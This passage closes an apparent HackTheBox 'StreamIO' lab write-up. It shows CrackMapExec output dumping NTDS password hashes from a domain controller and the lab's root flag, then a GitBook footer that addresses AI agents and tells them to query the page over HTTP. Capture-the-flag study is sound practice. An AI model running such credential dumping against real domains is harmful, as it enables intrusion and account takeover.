SMB 10.10.11.158 445 DC yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
SMB 10.10.11.158 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:8f92fd746817af09faa8257dfc127736:::
SMB 10.10.11.158 445 DC [+] Dumped 8 NTDS hashes to /home/kali/.cme/logs/DC_10.10.11.158_2024-07-09_083839.ntds of which 7 were added to the database
```
> Root Flag: fcca05f1388d18d964521ce53582793
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-streamio.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.